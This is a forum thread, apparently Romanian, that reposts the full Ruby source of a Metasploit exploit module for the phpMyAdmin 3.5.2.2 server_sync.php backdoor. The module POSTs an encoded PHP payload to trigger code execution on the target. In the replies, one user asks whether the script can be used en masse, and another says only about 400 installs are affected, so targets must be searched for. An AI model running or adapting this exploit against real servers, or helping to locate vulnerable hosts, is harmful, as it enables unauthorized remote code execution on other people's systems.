Nytro Posted October 16, 2012 Report Share Posted October 16, 2012 [h=1]phpMyAdmin 3.5.2.2 server_sync.php Backdoor[/h]### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate' => 'Sep 25 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin']) ], self.class) end def exploit uris = [] tpath = datastore['PATH'] if tpath[-1,1] == '/' tpath = tpath.chop end pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%") res = send_request_raw( { 'global' => true, 'uri' => tpath + "/server_sync.php", 'method' => 'POST', 'data' => pdata, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => pdata.length, } }, 1.0) handler endendSursa: phpMyAdmin 3.5.2.2 server_sync.php Backdoor Quote Link to comment Share on other sites More sharing options...
zin0 Posted October 19, 2012 Report Share Posted October 19, 2012 in masa nu se poate folosi scriptul ? Quote Link to comment Share on other sites More sharing options...
B7ackAnge7z Posted October 19, 2012 Report Share Posted October 19, 2012 in masa nu se poate folosi scriptul ?Din fericire (sau nu?) doar ~400 utilizatori au desc?rcat acest backdoor — deci, trebuie c?uta?i cu lumân?rica. Quote Link to comment Share on other sites More sharing options...